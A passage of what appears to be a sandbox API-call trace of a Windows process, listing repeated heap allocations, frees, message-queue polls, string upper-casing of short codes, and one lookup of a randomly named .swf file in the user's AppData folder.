wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.941] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0196.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.942] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.944] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.945] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0196.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/e-h1xk7cgYR.swf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9efa880, ftCreationTime.dwHighDateTime=0x1d4cff9, ftLastAccessTime.dwLowDateTime=0x2f665040, ftLastAccessTime.dwHighDateTime=0x1d4cf98, ftLastWriteTime.dwLowDateTime=0x2f665040, ftLastWriteTime.dwHighDateTime=0x1d4cf98, nFileSizeHigh=0x0, nFileSizeLow=0x77a7, dwReserved0=0xffb0039, dwReserved1=0x133db, cFileName="e-h1xk7cgYR.swf", cAlternateFileName="E-H1XK~1.SWF")) returned 0xaa5660 [0196.947] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.947] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0196.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.949] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.949] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.949] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.950] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.950] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.950] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.950] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.950] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.951] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.951] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 